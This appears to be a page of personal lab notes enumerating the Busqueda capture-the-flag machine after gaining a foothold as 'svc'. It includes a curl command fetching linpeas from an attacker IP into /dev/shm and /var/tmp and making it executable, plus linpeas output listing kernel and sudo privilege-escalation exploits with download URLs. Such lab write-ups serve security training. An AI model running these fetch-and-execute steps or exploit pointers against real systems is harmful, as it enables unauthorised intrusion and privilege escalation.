InfoSec LAB

Busqueda_Automated

Created: 4 min read

PEAS

svc@busqueda:/dev/shm$ mount | grep -i tmpfs
udev on /dev type devtmpfs (rw,nosuid,relatime,size=935772k,nr_inodes=233943,mode=755,inode64)
tmpfs on /run type tmpfs (rw,nosuid,nodev,noexec,relatime,size=198824k,mode=755,inode64)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,inode64)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k,inode64)
tmpfs on /run/snapd/ns type tmpfs (rw,nosuid,nodev,noexec,relatime,size=198824k,mode=755,inode64)

/dev/shm

svc@busqueda:/dev/shm$ curl -s http://10.10.16.8/linpeas_CVE_check.sh -o ./linpeas.sh ; chmod 755 ./linpeas.sh

Delivery complete

svc@busqueda:/dev/shm$ ll
total 0
0 drwxrwxrwt  2 root root   40 nov 27 17:57 .
0 drwxr-xr-x 20 root root 4.0k nov 27 15:51 ..

A moment later, content within the directory is WIPED OUT This surely indicates that there is a running cronjob

svc@busqueda:/var/tmp$ curl -s http://10.10.16.8/linpeas_CVE_check.sh -o ./linpeas.sh ; chmod 755 ./linpeas.sh

I will try out the /var/tmp directory Executing PEAS

CVEs

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: probable
   Tags: [ ubuntu=(22.04) ]{kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

ENV VARs

╔══════════╣ Environment
 Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
pm_out_log_path=/root/.pm2/logs/app-out.log
HISTFILESIZE=0
app={}
USER=svc
restart_time=0
PM2_USAGE=CLI
SHLVL=3
gid=1000
HOME=/home/svc
username=root
OLDPWD=/var/www/app
PM2_HOME=/root/.pm2
PM2_INTERACTOR_PROCESSING=true
created_at=1701100278221
PYTHONUNBUFFERED=1
pm_cwd=/var/www/app
namespace=default
uid=1000
SYSTEMD_EXEC_PID=1276
WERKZEUG_SERVER_FD=4
pm_exec_path=/var/www/app/app.py
unstable_restarts=0
pm_id=0
kill_retry_time=100
LOGNAME=root
node_args=
journal_stream=8:36022
_=./linpeas.sh
TERM=xterm-256color
exec_mode=fork_mode
NODE_APP_INSTANCE=0
axm_monitor=[object Object]
windowsHide=true
status=launching
path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
exec_interpreter=python3
INVOCATION_ID=21d1137ec0c8492e8e522b7b7a806a51
axm_options=[object Object]
axm_dynamic=[object Object]
LANG=en_US.UTF-8
vizion=true
pm_pid_path=/root/.pm2/pids/app-0.pid
pm_err_log_path=/root/.pm2/logs/app-error.log
HISTSIZE=0
treekill=true
LS_COLORS=
PM2_JSON_PROCESSING=true
SHELL=/bin/sh
pmx=true
unique_id=43136e0a-3f8b-4cc7-a840-b448432d1915
NODE_CHANNEL_SERIALIZATION_MODE=json
automation=true
LESSCLOSE=/usr/bin/lesspipe %s %s
vizion_running=false
cwd=/var/www/app
instance_var=NODE_APP_INSTANCE
name=app
PWD=/var/tmp
env=[object Object]
PIDFILE=/root/.pm2/pm2.pid
km_link=false
instances=1
axm_actions=
merge_logs=true
NODE_CHANNEL_FD=3
autorestart=true
HISTFILE=/dev/null
pm_uptime=1701100278221

Containers

System Timer Services

╔══════════╣ System timers
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                        LEFT          LAST                        PASSED                UNIT                           ACTIVATES
mon 2023-11-27 18:19:41 UTC 14min left    Tue 2023-04-04 16:06:52 UTC 7 months 24 days ago  motd-news.timer                motd-news.service
mon 2023-11-27 20:08:39 UTC 2h 3min left  Tue 2023-02-28 11:52:21 UTC 8 months 28 days ago  apt-daily.timer                apt-daily.service
mon 2023-11-27 23:29:51 UTC 5h 25min left Mon 2023-11-27 16:48:44 UTC 1h 16min ago          ua-timer.timer                 ua-timer.service
tue 2023-11-28 00:00:00 UTC 5h 55min left n/a                         n/a                   dpkg-db-backup.timer           dpkg-db-backup.service
tue 2023-11-28 00:00:00 UTC 5h 55min left Mon 2023-11-27 15:51:06 UTC 2h 13min ago          logrotate.timer                logrotate.service
tue 2023-11-28 02:48:37 UTC 8h left       Fri 2023-01-06 15:07:14 UTC 10 months 20 days ago fwupd-refresh.timer            fwupd-refresh.service
tue 2023-11-28 06:45:46 UTC 12h left      Mon 2023-11-27 16:34:03 UTC 1h 30min ago          apt-daily-upgrade.timer        apt-daily-upgrade.service
tue 2023-11-28 10:01:27 UTC 15h left      Mon 2023-11-27 16:58:25 UTC 1h 6min ago           man-db.timer                   man-db.service
tue 2023-11-28 15:56:01 UTC 21h left      Mon 2023-11-27 15:56:01 UTC 2h 8min ago           update-notifier-download.timer update-notifier-download.service
tue 2023-11-28 16:05:59 UTC 22h left      Mon 2023-11-27 16:05:59 UTC 1h 58min ago          systemd-tmpfiles-clean.timer   systemd-tmpfiles-clean.service
tue 2023-11-28 23:55:08 UTC 1 day 5h left Wed 2022-06-15 15:13:23 UTC 1 year 5 months ago   update-notifier-motd.timer     update-notifier-motd.service
sun 2023-12-03 03:10:04 UTC 5 days left   Mon 2023-11-27 15:51:54 UTC 2h 12min ago          e2scrub_all.timer              e2scrub_all.service
mon 2023-12-04 00:22:58 UTC 6 days left   Mon 2023-11-27 16:30:00 UTC 1h 34min ago          fstrim.timer                   fstrim.service
n/a                         n/a           n/a                         n/a                   apport-autoreport.timer        apport-autoreport.service
n/a                         n/a           n/a                         n/a                   snapd.snap-repair.timer        snapd.snap-repair.service

Hosts

gitea.searcher.htb

Busqueda

Installed Programs

Compilers

MySQL

Web

This explains the Busqueda

SSH

tmux

/opt

Interactive Graph View

Backlinks